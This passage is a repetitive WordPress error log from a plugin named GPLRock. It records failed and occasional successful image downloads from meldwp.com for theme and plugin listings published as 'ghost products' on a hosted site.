HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cured---one-page-medical-doctor-wordpress-theme-27834.webp for product cured-one-page-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:33:48 UTC] GPLRock WARNING: Image download failed for product cured-one-page-medical-doctor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cured---one-page-medical-doctor-wordpress-theme-27834.webp [06-Apr-2026 02:33:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cured-one-page-medical-doctor-wordpress-theme [06-Apr-2026 02:33:48 UTC] GPLRock: Image download failed for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:51 UTC] GPLRock: Image download failed for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revo---multipurpose-elementor-woocommerce-wordpress-theme-25-homepages--5-mobile-24073.webp for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:33:53 UTC] GPLRock: Image download failed for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:55 UTC] GPLRock: Image download failed for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revo---multipurpose-elementor-woocommerce-wordpress-theme-25-homepages--5-mobile-24073.webp for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:33:57 UTC] GPLRock WARNING: Image download failed for product revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts. URL: https://meldwp.com/wp-content/uploads/revo---multipurpose-elementor-woocommerce-wordpress-theme-25-homepages--5-mobile-24073.webp [06-Apr-2026 02:33:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revo-multipurpose-elementor-woocommerce-wordpress-theme-25-homepages-5-mobile-layouts [06-Apr-2026 02:33:57 UTC] GPLRock: Image download failed for product gosolar-eco-environmental-nature-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:33:59 UTC] GPLRock: Image download failed for product gosolar-eco-environmental-nature-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gosolar---eco-environmental--nature-wordpress-theme-5176.webp for product gosolar-eco-environmental-nature-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:02 UTC] GPLRock: Image download failed for product gosolar-eco-environmental-nature-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:04 UTC] GPLRock: Image download failed for product gosolar-eco-environmental-nature-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gosolar---eco-environmental--nature-wordpress-theme-5176.webp for product gosolar-eco-environmental-nature-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:06 UTC] GPLRock WARNING: Image download failed for product gosolar-eco-environmental-nature-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gosolar---eco-environmental--nature-wordpress-theme-5176.webp [06-Apr-2026 02:34:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gosolar-eco-environmental-nature-wordpress-theme [06-Apr-2026 02:34:06 UTC] GPLRock: Image downloaded successfully for product choros-responsive-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-206f7af4.webp [06-Apr-2026 02:34:06 UTC] GPLRock: Using pre-downloaded image for product choros-responsive-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-206f7af4.webp [06-Apr-2026 02:34:06 UTC] GPLRock: Ghost product published with image - Product ID: choros-responsive-multipurpose-wordpress-theme [06-Apr-2026 02:34:06 UTC] GPLRock: Image downloaded successfully for product apress-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-470a3749.webp [06-Apr-2026 02:34:06 UTC] GPLRock: Using pre-downloaded image for product apress-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-470a3749.webp [06-Apr-2026 02:34:06 UTC] GPLRock: Ghost product published with image - Product ID: apress-responsive-multi-purpose-wordpress-theme [06-Apr-2026 02:34:06 UTC] GPLRock: Image download failed for product maestro-business-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:09 UTC] GPLRock: Image download failed for product maestro-business-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maestro---business--finance-wordpress-theme-4618.webp for product maestro-business-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:11 UTC] GPLRock: Image download failed for product maestro-business-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:13 UTC] GPLRock: Image download failed for product maestro-business-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maestro---business--finance-wordpress-theme-4618.webp for product maestro-business-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:15 UTC] GPLRock WARNING: Image download failed for product maestro-business-finance-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maestro---business--finance-wordpress-theme-4618.webp [06-Apr-2026 02:34:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maestro-business-finance-wordpress-theme [06-Apr-2026 02:34:15 UTC] GPLRock: Image download failed for product imogen-designer-and-creative-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:17 UTC] GPLRock: Image download failed for product imogen-designer-and-creative-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/imogen---designer-and-creative-business-wordpress-theme-8134.webp for product imogen-designer-and-creative-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:19 UTC] GPLRock: Image download failed for product imogen-designer-and-creative-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:21 UTC] GPLRock: Image download failed for product imogen-designer-and-creative-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/imogen---designer-and-creative-business-wordpress-theme-8134.webp for product imogen-designer-and-creative-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:24 UTC] GPLRock WARNING: Image download failed for product imogen-designer-and-creative-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/imogen---designer-and-creative-business-wordpress-theme-8134.webp [06-Apr-2026 02:34:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: imogen-designer-and-creative-business-wordpress-theme [06-Apr-2026 02:34:24 UTC] GPLRock: Image download failed for product strollik-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:26 UTC] GPLRock: Image download failed for product strollik-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/strollik---single-product-woocommerce-wordpress-theme-31137.webp for product strollik-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:28 UTC] GPLRock: Image download failed for product strollik-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:30 UTC] GPLRock: Image download failed for product strollik-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/strollik---single-product-woocommerce-wordpress-theme-31137.webp for product strollik-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:32 UTC] GPLRock WARNING: Image download failed for product strollik-single-product-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/strollik---single-product-woocommerce-wordpress-theme-31137.webp [06-Apr-2026 02:34:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: strollik-single-product-woocommerce-wordpress-theme [06-Apr-2026 02:34:32 UTC] GPLRock: Image download failed for product connect-software-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:34 UTC] GPLRock: Image download failed for product connect-software-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connect---software-company-wordpress-theme-16742.webp for product connect-software-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:37 UTC] GPLRock: Image download failed for product connect-software-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:39 UTC] GPLRock: Image download failed for product connect-software-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:34:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/connect---software-company-wordpress-theme-16742.webp for product connect-software-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:34:41 UTC] GPLRock WARNING: Image download failed for product connect-software-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/connect---software-company-wordpress-theme-16742.webp [06-Apr-2026 02:34:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: connect-software-company-wordpress-theme [06-Apr-2026 02:36:05 UTC] GPLRock: Image download failed for product detox-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:07 UTC] GPLRock: Image download failed for product detox-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/detox---data-science--analytics-wordpress-theme-1540.webp for product detox-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:36:09 UTC] GPLRock: Image download failed for product detox-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:11 UTC] GPLRock: Image download failed for product detox-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/detox---data-science--analytics-wordpress-theme-1540.webp for product detox-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:36:13 UTC] GPLRock WARNING: Image download failed for product detox-data-science-analytics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/detox---data-science--analytics-wordpress-theme-1540.webp [06-Apr-2026 02:36:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: detox-data-science-analytics-wordpress-theme [06-Apr-2026 02:36:13 UTC] GPLRock: Image download failed for product emojination-night-club-concert-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:15 UTC] GPLRock: Image download failed for product emojination-night-club-concert-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 02:36:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emojination--night-club--concert-event-wordpress-theme-22681.webp for product emojination-night-club-concert-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 02:36:18 UTC] GPLRock: Image download failed for product emojination-night-club-concert-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:09 UTC] GPLRock: Image download failed for product woocommerce-show-variations-as-single-product-on-shop-category-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:11 UTC] GPLRock: Image download failed for product woocommerce-show-variations-as-single-product-on-shop-category-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-show-variations-as-single-product-on-shop--category-plugin-12647.webp for product woocommerce-show-variations-as-single-product-on-shop-category-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:13 UTC] GPLRock: Image download failed for product woocommerce-show-variations-as-single-product-on-shop-category-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:15 UTC] GPLRock: Image download failed for product woocommerce-show-variations-as-single-product-on-shop-category-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-show-variations-as-single-product-on-shop--category-plugin-12647.webp for product woocommerce-show-variations-as-single-product-on-shop-category-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:17 UTC] GPLRock WARNING: Image download failed for product woocommerce-show-variations-as-single-product-on-shop-category-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-show-variations-as-single-product-on-shop--category-plugin-12647.webp [06-Apr-2026 06:25:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-show-variations-as-single-product-on-shop-category-plugin [06-Apr-2026 06:25:17 UTC] GPLRock: Image download failed for product getresponse-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:20 UTC] GPLRock: Image download failed for product getresponse-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/getresponse-for-nex-forms-31859.webp for product getresponse-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:22 UTC] GPLRock: Image download failed for product getresponse-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:24 UTC] GPLRock: Image download failed for product getresponse-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/getresponse-for-nex-forms-31859.webp for product getresponse-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:26 UTC] GPLRock WARNING: Image download failed for product getresponse-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/getresponse-for-nex-forms-31859.webp [06-Apr-2026 06:25:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: getresponse-for-nex-forms [06-Apr-2026 06:25:26 UTC] GPLRock: Image download failed for product bookly-chain-appointments-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:28 UTC] GPLRock: Image download failed for product bookly-chain-appointments-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-chain-appointments-add-on-32499.webp for product bookly-chain-appointments-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:30 UTC] GPLRock: Image download failed for product bookly-chain-appointments-add-on (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:33 UTC] GPLRock: Image download failed for product bookly-chain-appointments-add-on (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookly-chain-appointments-add-on-32499.webp for product bookly-chain-appointments-add-on after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:35 UTC] GPLRock WARNING: Image download failed for product bookly-chain-appointments-add-on. URL: https://meldwp.com/wp-content/uploads/bookly-chain-appointments-add-on-32499.webp [06-Apr-2026 06:25:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookly-chain-appointments-add-on [06-Apr-2026 06:25:35 UTC] GPLRock: Image download failed for product onepage-hyperlinks-navigation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:37 UTC] GPLRock: Image download failed for product onepage-hyperlinks-navigation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onepage-hyperlinks-navigation-24619.webp for product onepage-hyperlinks-navigation after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:39 UTC] GPLRock: Image download failed for product onepage-hyperlinks-navigation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:41 UTC] GPLRock: Image download failed for product onepage-hyperlinks-navigation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onepage-hyperlinks-navigation-24619.webp for product onepage-hyperlinks-navigation after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:43 UTC] GPLRock WARNING: Image download failed for product onepage-hyperlinks-navigation. URL: https://meldwp.com/wp-content/uploads/onepage-hyperlinks-navigation-24619.webp [06-Apr-2026 06:25:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onepage-hyperlinks-navigation [06-Apr-2026 06:25:43 UTC] GPLRock: Image download failed for product stockupp-advanced-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:46 UTC] GPLRock: Image download failed for product stockupp-advanced-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stockupp-advanced-shipping-for-woocommerce-23655.webp for product stockupp-advanced-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:48 UTC] GPLRock: Image download failed for product stockupp-advanced-shipping-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:50 UTC] GPLRock: Image download failed for product stockupp-advanced-shipping-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stockupp-advanced-shipping-for-woocommerce-23655.webp for product stockupp-advanced-shipping-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:52 UTC] GPLRock WARNING: Image download failed for product stockupp-advanced-shipping-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/stockupp-advanced-shipping-for-woocommerce-23655.webp [06-Apr-2026 06:25:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stockupp-advanced-shipping-for-woocommerce [06-Apr-2026 06:25:52 UTC] GPLRock: Image downloaded successfully for product woocommerce-variant-update-on-cart-page (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7cc7e433.webp [06-Apr-2026 06:25:52 UTC] GPLRock: Using pre-downloaded image for product woocommerce-variant-update-on-cart-page: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7cc7e433.webp [06-Apr-2026 06:25:52 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-variant-update-on-cart-page [06-Apr-2026 06:25:52 UTC] GPLRock: Image download failed for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:54 UTC] GPLRock: Image download failed for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/b2b-marketplace-for-woocommerce--b2b-wholesale-plugin-8150.webp for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:25:57 UTC] GPLRock: Image download failed for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:25:59 UTC] GPLRock: Image download failed for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/b2b-marketplace-for-woocommerce--b2b-wholesale-plugin-8150.webp for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:01 UTC] GPLRock WARNING: Image download failed for product b2b-marketplace-for-woocommerce-b2b-wholesale-plugin. URL: https://meldwp.com/wp-content/uploads/b2b-marketplace-for-woocommerce--b2b-wholesale-plugin-8150.webp [06-Apr-2026 06:26:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: b2b-marketplace-for-woocommerce-b2b-wholesale-plugin [06-Apr-2026 06:26:01 UTC] GPLRock: Image download failed for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:03 UTC] GPLRock: Image download failed for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features-5164.webp for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:05 UTC] GPLRock: Image download failed for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:07 UTC] GPLRock: Image download failed for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features-5164.webp for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:09 UTC] GPLRock WARNING: Image download failed for product quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features. URL: https://meldwp.com/wp-content/uploads/quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features-5164.webp [06-Apr-2026 06:26:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quick-order-flutter-mobile-app-for-woocommerce-with-multivendor-features [06-Apr-2026 06:26:10 UTC] GPLRock: Image download failed for product dt-store-locator-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:12 UTC] GPLRock: Image download failed for product dt-store-locator-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dt---store-locator-wordpress-plugin-16862.webp for product dt-store-locator-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:14 UTC] GPLRock: Image download failed for product dt-store-locator-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:16 UTC] GPLRock: Image download failed for product dt-store-locator-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dt---store-locator-wordpress-plugin-16862.webp for product dt-store-locator-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:18 UTC] GPLRock WARNING: Image download failed for product dt-store-locator-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/dt---store-locator-wordpress-plugin-16862.webp [06-Apr-2026 06:26:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dt-store-locator-wordpress-plugin [06-Apr-2026 06:26:18 UTC] GPLRock: Image download failed for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:20 UTC] GPLRock: Image download failed for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landingue---landing-and-one-page-builder-plugin-for-wordpress-site-6316.webp for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:23 UTC] GPLRock: Image download failed for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:25 UTC] GPLRock: Image download failed for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landingue---landing-and-one-page-builder-plugin-for-wordpress-site-6316.webp for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:27 UTC] GPLRock WARNING: Image download failed for product landingue-landing-and-one-page-builder-plugin-for-wordpress-site. URL: https://meldwp.com/wp-content/uploads/landingue---landing-and-one-page-builder-plugin-for-wordpress-site-6316.webp [06-Apr-2026 06:26:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: landingue-landing-and-one-page-builder-plugin-for-wordpress-site [06-Apr-2026 06:26:44 UTC] GPLRock: Image download failed for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:46 UTC] GPLRock: Image download failed for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landpick---multipurpose-apps-landing-page-template-wordpress-theme-for-app-promo-4514.webp for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:48 UTC] GPLRock: Image download failed for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:50 UTC] GPLRock: Image download failed for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landpick---multipurpose-apps-landing-page-template-wordpress-theme-for-app-promo-4514.webp for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:52 UTC] GPLRock WARNING: Image download failed for product landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site. URL: https://meldwp.com/wp-content/uploads/landpick---multipurpose-apps-landing-page-template-wordpress-theme-for-app-promo-4514.webp [06-Apr-2026 06:26:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: landpick-multipurpose-apps-landing-page-template-wordpress-theme-for-app-promotion-marketing-site [06-Apr-2026 06:26:52 UTC] GPLRock: Image download failed for product onekorse-lms-education-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:55 UTC] GPLRock: Image download failed for product onekorse-lms-education-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onekorse---lms-education-theme-30175.webp for product onekorse-lms-education-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 06:26:57 UTC] GPLRock: Image download failed for product onekorse-lms-education-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 06:26:59 UTC] GPLRock: Image download failed for product 